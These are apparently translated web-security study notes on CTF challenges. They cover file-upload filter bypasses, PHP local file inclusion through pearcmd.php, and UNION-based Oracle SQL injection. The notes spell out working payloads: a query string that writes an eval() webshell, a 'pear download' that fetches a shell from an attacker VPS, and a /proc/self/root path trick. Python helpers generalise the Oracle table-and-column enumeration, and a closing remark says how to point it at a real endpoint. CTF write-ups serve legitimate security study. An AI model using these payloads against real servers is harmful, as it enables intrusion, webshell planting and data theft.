upload_lab supplementary notes

Common bypasses

  • Front-end interception

The front end is a paper tiger.
Simple case: edit or disable the front-end JS from the browser console.
Complex case: upload a legitimate file, then modify the request in the proxy (filename and content) before it reaches the server.

  • MIME type check

For example, if the server only accepts

Content-Type: image/png

then just change the Content-Type of the file part to the expected value when uploading the webshell.
The header is fully client-controlled and has no effect on how the file is used afterwards.

  • Blacklist (incomplete filter)

Many extensions can be parsed as PHP (which ones actually execute depends on the handler mapping on the target), so an incomplete blacklist leaves gaps.
Common ones:

php,php3,php4,php5,phtml
  • Blacklist (every webshell extension filtered)

Upload a .htaccess file (works only with Apache + mod_php, and only if the directory allows overrides).
It can make additional file types be parsed as PHP, e.g. by mapping .jpg to the PHP handler with an AddType application/x-httpd-php .jpg line.
Note that the block below is not .htaccess content; it is the httpd.conf <Directory> configuration (AllowOverride All) that lets an uploaded .htaccess take effect in the first place:

<Directory />
Options +Indexes +FollowSymLinks +ExecCGI
AllowOverride All
Order allow,deny
Allow from all
Require all granted
</Directory>

Upload a .user.ini file (honoured only when PHP runs as CGI/FastCGI such as php-fpm; mod_php ignores it; picked up after user_ini.cache_ttl, 300 s by default)

auto_prepend_file=test.txt

This prepends test.txt (an uploaded "image" containing PHP) to every .php script in that directory, so there must be an existing .php file in the directory to request.
  • Filename processing logic

Trailing dot, trailing space, double-writing the extension (when the filter deletes the keyword only once), 0x00 truncation.
Not repeating those here.

LFI

PHP pear file inclusion vulnerability

PEAR stands for PHP Extension and Application Repository.
When the register_argc_argv option is on (the compiled-in default is On, which is why php Docker images that ship without an active php.ini are affected), PHP also fills $_SERVER['argv'] for web requests:
the raw query string (everything after ? in the URL, without percent-decoding) is split on + into argv.
Source of the pear wrapper script (the shell script that launches pearcmd.php from the CLI):

#!/bin/sh

# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
PHP="$PHP_PEAR_PHP_BIN"
else
if test "/usr/bin/php" = '@'php_bin'@'; then
PHP=php
else
PHP="/usr/bin/php"
fi
fi

# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
INCDIR=$PHP_PEAR_INSTALL_DIR
INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
if test "/usr/share/php" = '@'php_dir'@'; then
INCDIR=`dirname $0`
INCARG=""
else
INCDIR="/usr/share/php"
INCARG="-d include_path=/usr/share/php"
fi
fi

exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"

pearcmd.php reads its command line from $_SERVER['argv'] (Console_Getopt::readPHPArgv()). Launched by the wrapper above those are real CLI arguments; in a web request with register_argc_argv=On they come from the query string instead, so an LFI that includes pearcmd.php lets the attacker run any pear subcommand, for example one that writes a file (config-create) or fetches one from a URL (download).

  • newstarctf 2023 public track: include 🍐

<?php
error_reporting(0);
if(isset($_GET['file'])) {
$file = $_GET['file'];

if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
die('hacker!');
}

include($file.".php");
# Something in phpinfo.php!
}
else {
highlight_file(__FILE__);
}
?>

Following the hint, open phpinfo.php
and find fake{Check_register_argc_argv}.
phpinfo shows register_argc_argv = On (local and master value),
the PHP configuration path is /usr/local/etc/php (the official php Docker image layout, where PEAR lives under /usr/local/lib/php),
and the current script is SCRIPT_FILENAME /var/www/html/index.php.
So pearcmd.php can be used for command execution.
Subcommands the pear command accepts (the ones used here are config-create and download):

Construct:

?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>+/var/www/html/a.php

$_GET['file'] parses as /usr/local/lib/php/pearcmd, so include($file.".php") loads pearcmd.php, while the raw query string split on + becomes argv. The command that actually runs on the server is:

pear config-create "/&file=/usr/local/lib/php/pearcmd&/<?=eval($_POST[1]);?>" /var/www/html/a.php

config-create writes a PEAR config file at the second argument with the first argument (the "root", which must be an absolute path starting with /) embedded verbatim, so a.php now contains the eval() stub.
Finally include a.php (?file=a) to get a shell.
PS: send the angle brackets raw with Burp Suite. A browser percent-encodes < and >, and argv is taken from the raw query string, so the encoded form would be written into a.php literally and the PHP tag would not open.
https://whhxy4.github.io/2023/10/18/%E5%85%B3%E4%BA%8E%E5%88%A9%E7%94%A8pearcmd%E8%BF%9B%E8%A1%8C%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/#:~:text=PHP%E8%A3%B8%E6%96%87%E4%BB%B6

  • [极客大挑战2024]ez_include

Challenge:

<?php
highlight_file(__FILE__);
require_once 'starven_secret.php';
if(isset($_GET['file'])) {
if(preg_match('/starven_secret.php/i', $_GET['file'])) {
require_once $_GET['file'];
}else{
echo "还想非预期?";
}
}

This level is about bypassing the require_once restriction: starven_secret.php was already loaded by the require_once at the top, and require_once refuses to load a path that resolves to an already-included file. The trick from the linked article is to repeat /proc/self/root/ (a symlink to /) in the path enough times that PHP's realpath-based resolution gives up, so the already-included lookup never matches while the file itself can still be opened; wrapping it in php://filter/convert.base64-encode returns the source encoded instead of executing it.
Details: https://www.anquanke.com/post/id/213235
payload:

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/starven_secret.php

That works and leads to the second step, /levelllll2.php:

<?php
error_reporting(0);
highlight_file(__FILE__);
if (isset($_GET ["syc"])){
$file = $_GET ["syc"];
$hint = "register_argc_argv = On";
if (preg_match("/config|create|filter|download|phar|log|sess|-c|-d|%|data/i", $file)) {
die("hint都给的这么明显了还不会做?");
}
if(substr($_SERVER['REQUEST_URI'], -4) === '.php'){
include $file;
}
}

The hint register_argc_argv = On points to the pear file inclusion trick again.
Note the two checks: the regex (which blocks config, create, download, -c, -d, % and so on) runs only on $_GET['syc'], not on the whole query string, and REQUEST_URI must end in .php. argv is built from the entire raw query string, so the pear subcommand can live in a separate, unfiltered part of the query, and ending the remote filename with 1.php satisfies the .php check.
Payload:

/levelllll2.php?syc=/usr/local/lib/php/pearcmd.php&+download+http://<vps-ip>:<vps-port>/1.php

pear download fetches the URL and saves 1.php into the current working directory (the web root here); requesting 1.php then gives a shell.
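How the query string turns into pearcmd's argv, covering both the pear mechanism described above and the two challenge payloads (include 🍐 and ez_include level 2). This is an added example, not code from the write-ups or from PEAR: php_argv() mirrors what PHP's php_build_argv() does for a web request with register_argc_argv=On (raw query string split on +), php_get() the normal $_GET parsing of the same string, pear_dispatch() what pearcmd.php does with argv via Console_Getopt; the two regexes are the challenges' own. The VPS address 203.0.113.10:8000 is a constructed placeholder.

```python
"""From query string to pearcmd argv: the pear LFI mechanism and the two CTF payloads.

Added example, not code from the write-ups or from PEAR. php_argv() mirrors
PHP's php_build_argv() for a web request with register_argc_argv=On, php_get()
the normal $_GET parsing of the same string, pear_dispatch() what pearcmd.php
does with argv via Console_Getopt. The regexes are the two challenges' own.
"""
import re
from urllib.parse import parse_qs

PEARCMD = "/usr/local/lib/php/pearcmd.php"
LEVEL1_RE = re.compile(r"flag|log|session|filter|input|data", re.I)
LEVEL2_RE = re.compile(r"config|create|filter|download|phar|log|sess|-c|-d|%|data", re.I)

# Constructed payloads; 203.0.113.10:8000 is a placeholder for the attacker's VPS.
NEWSTAR_QS = ("+config-create+/&file=/usr/local/lib/php/pearcmd"
              "&/<?=eval($_POST[1]);?>+/var/www/html/a.php")
EZ_INCLUDE_URI = ("/levelllll2.php?syc=/usr/local/lib/php/pearcmd.php"
                  "&+download+http://203.0.113.10:8000/1.php")
EZ_INCLUDE_NAIVE = ("/levelllll2.php?syc=/usr/local/lib/php/pearcmd.php"
                    "+download+http://203.0.113.10:8000/1.php")


def php_argv(query_string):
    """$_SERVER['argv'] in a web request: the RAW query string split on '+'
    (no percent-decoding, empty tokens kept). argv[0] is whatever precedes
    the first '+', which is why the pear command must come after a '+'."""
    return query_string.split("+") if query_string else []


def php_get(query_string, key):
    """$_GET for the same string: percent-decoded, '+' becomes a space,
    '&' separates parameters. Returns None when the key is absent."""
    return parse_qs(query_string, keep_blank_values=True).get(key, [None])[0]


def pear_dispatch(argv):
    """pearcmd.php + Console_Getopt::getopt2(): argv[0] is ignored, leading
    '-x' tokens are pear options (-c/-d choose the config file / ini values,
    hence their presence in the level-2 blocklist), the first non-option is
    the subcommand and everything after it its arguments."""
    rest = argv[1:]
    opts = []
    while rest and rest[0].startswith("-") and rest[0] != "--":
        opts.append(rest.pop(0))
    if rest and rest[0] == "--":
        rest.pop(0)
    if not rest:
        return opts, None, []
    return opts, rest[0], rest[1:]


def include_pearcmd_level1(query_string):
    """include 🍐: regex on $_GET['file'], then include($file . '.php')."""
    file = php_get(query_string, "file")
    if file is None or LEVEL1_RE.search(file) or file + ".php" != PEARCMD:
        return None
    return pear_dispatch(php_argv(query_string))


def include_pearcmd_level2(request_uri):
    """ez_include level 2: regex only on $_GET['syc'], REQUEST_URI must end
    in .php, then include $file. argv still comes from the whole query."""
    _, _, qs = request_uri.partition("?")
    syc = php_get(qs, "syc")
    if syc is None or LEVEL2_RE.search(syc) or not request_uri.endswith(".php"):
        return None
    if syc != PEARCMD:
        return None
    return pear_dispatch(php_argv(qs))


def config_create_writes(command, args):
    """'pear config-create <root> <file>': root must be absolute (start with
    '/'); the config written to <file> embeds root verbatim, so a PHP tag in
    root ends up in the file. Returns (target path, root contains a PHP tag)."""
    if command != "config-create" or len(args) != 2 or not args[0].startswith("/"):
        return None
    root, target = args
    return target, "<?" in root


if __name__ == "__main__":
    print(php_argv(NEWSTAR_QS))
    print(include_pearcmd_level1(NEWSTAR_QS))
    print(include_pearcmd_level2(EZ_INCLUDE_URI))
    print(include_pearcmd_level2(EZ_INCLUDE_NAIVE))  # None: 'download' lands inside syc
```

The naive variant shows the point of the level-2 payload: put the subcommand inside syc and $_GET turns the + into a space, so the regex sees "download" and blocks it, while placing it after & keeps it out of syc but still inside the raw query string that argv is built from.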

CVE-2024-2961

https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py

phar file inclusion

Oracle

Oracle Database, also called Oracle RDBMS or simply Oracle,
is the relational database management system from Oracle Corporation.
It has long been one of the leading products in the database field
and one of the most widely deployed relational databases,
valued for portability, ease of use and breadth of features,
and used on large, medium and small systems alike
as a reliable, high-throughput database solution.

Database operations

• Query the database version

-- no privilege needed
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
-- privilege needed
SELECT version FROM v$instance;

• Query the operating system (the TNS banner names the platform)

SELECT banner FROM v$version where banner like 'TNS%';

• Query the host name the database runs on

-- privilege needed
SELECT UTL_INADDR.get_host_name FROM dual;
-- privilege needed
SELECT host_name FROM v$instance;
-- privilege needed
SELECT UTL_INADDR.get_host_name('127.0.0.1') FROM dual;

• List the tables owned by the current user

SELECT DISTINCT owner,table_name FROM all_tables WHERE owner=user;

• Query the current database name

-- no privilege needed
SELECT global_name FROM global_name;
-- no privilege needed
SELECT SYS.DATABASE_NAME FROM DUAL;
-- privilege needed
SELECT name FROM v$database;
-- privilege needed
SELECT instance_name FROM v$instance;

• List privileged accounts (grantees holding system privileges WITH ADMIN OPTION; plain user names are in ALL_USERS, readable without special privileges)

-- privilege needed (DBA_ view)
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES';

Injection payloads

https://blog.csdn.net/Javachichi/article/details/128711756

  • Identify the database type

    -- Oracle-only functions: if these evaluate without error the backend is Oracle
    -- (--+ : -- starts the Oracle line comment, + decodes to the space it needs after it)
    ?ename=-1' or to_char(1)=1--+
    ?ename=-1' or to_number('2e0')=2--+
  • Enumerate table names

Oracle before 12c has no LIMIT/OFFSET, so rownum=1 keeps the subquery scalar and each request excludes the names already seen (<> for one value, NOT IN for several) until nothing comes back.

    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name<>'BONUS'),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select table_name from user_tables where rownum=1 and table_name not in ('BONUS','DEPT','EMP')),NULL from dual--+
  • Enumerate the columns of a table (EMP here)

    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB','MGR')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select column_name from user_tab_columns where table_name='EMP' and rownum=1 and column_name not in ('EMPNO','ENAME','JOB','MGR','HIREDATE')),NULL from dual--+
  • Extract the data (ename from emp)

    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename<>'SMITH'),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename not in ('SMITH','ALLEN')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename not in ('SMITH','ALLEN','WARD')),NULL from dual--+
    ?ename=-1' union select NULL,NULL,(select ename from emp where rownum=1 and ename not in ('SMITH','ALLEN','WARD','JONES')),NULL from dual--+
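The rownum=1 / NOT IN chain above, generalised into a generator for any column and table, with a fake backend loaded with the SCOTT-style values the payloads walk through. This is an added example, not from the notes or the linked blog: the injection shape (parameter ename, four UNION columns with the third one displayed) is the one the payloads target, fake_oracle() is a stand-in for the real endpoint, and the SCOTT rows are constructed.

```python
"""The rownum=1 / NOT IN enumeration chain above, generalised.

Added example, not from the notes or the linked blog. next_row_payload()
builds the next request for any (expr, source) pair; enumerate_values()
drives it until the backend returns nothing. fake_oracle() stands in for the
injectable endpoint (parameter ename, 4-column UNION with column 3 displayed)
and answers from a constructed SCOTT-style data set.
"""
import re

# Constructed sample rows in the shape of the classic SCOTT demo schema.
SCOTT = {
    "user_tables": [{"table_name": t} for t in ("BONUS", "DEPT", "EMP", "SALGRADE")],
    "user_tab_columns": [{"table_name": "EMP", "column_name": c}
                         for c in ("EMPNO", "ENAME", "JOB")]
                        + [{"table_name": "DEPT", "column_name": c}
                           for c in ("DEPTNO", "DNAME")],
    "emp": [{"ename": n} for n in ("SMITH", "ALLEN", "WARD", "JONES")],
}


def oracle_literal(value):
    """Quote a value for the NOT IN list; Oracle escapes ' by doubling it."""
    return "'" + value.replace("'", "''") + "'"


def next_row_payload(expr, source, seen, extra_where=None):
    """Oracle (before 12c) has no LIMIT/OFFSET: rownum=1 keeps the subquery
    scalar and the values already extracted are excluded with NOT IN, so each
    request yields one new row regardless of the order Oracle returns them."""
    conds = [extra_where] if extra_where else []
    conds.append("rownum=1")
    if seen:
        conds.append(f"{expr} not in ({','.join(oracle_literal(v) for v in seen)})")
    sub = f"select {expr} from {source} where {' and '.join(conds)}"
    return f"-1' union select NULL,NULL,({sub}),NULL from dual--+"


def enumerate_values(expr, source, query, extra_where=None, limit=200):
    """Pull values until the endpoint shows nothing. The limit and the
    'value in seen' check guard against a backend that keeps echoing a value
    already in the list (NULL values are never returned by this technique)."""
    seen = []
    while len(seen) < limit:
        value = query(next_row_payload(expr, source, seen, extra_where))
        if value is None or value in seen:
            break
        seen.append(value)
    return seen


SUBQUERY_RE = re.compile(r"\(select (\w+) from (\w+) where (.+?)\),NULL from dual")
NOT_IN_RE = re.compile(r"(\w+) not in \((.*)\)")
EQ_RE = re.compile(r"(\w+)='([^']*)'")


def fake_oracle(payload):
    """Stand-in for the vulnerable endpoint: evaluates the injected subquery
    against SCOTT and returns the value the page would display, or None.
    Only the condition shapes next_row_payload() emits are understood."""
    m = SUBQUERY_RE.search(payload)
    expr, source, where = m.group(1), m.group(2), m.group(3)
    rows = SCOTT[source]
    for cond in where.split(" and "):
        if cond == "rownum=1":
            continue
        if (nm := NOT_IN_RE.fullmatch(cond)):
            col, lits = nm.group(1), nm.group(2)
            excluded = {lit[1:-1].replace("''", "'") for lit in lits.split(",")}
            rows = [r for r in rows if r[col] not in excluded]
        elif (em := EQ_RE.fullmatch(cond)):
            rows = [r for r in rows if r[em.group(1)] == em.group(2)]
    return rows[0][expr] if rows else None


if __name__ == "__main__":
    tables = enumerate_values("table_name", "user_tables", fake_oracle)
    print("tables:", tables)
    for t in tables:
        print(t, enumerate_values("column_name", "user_tab_columns", fake_oracle,
                                  f"table_name={oracle_literal(t)}"))
    print("ename:", enumerate_values("ename", "emp", fake_oracle))
```

Against a real target, replace fake_oracle with a function that sends the payload as the ename parameter and scrapes the displayed column; the generator output for an empty seen list and for the EMP column chain is byte-for-byte the first payload of each section above.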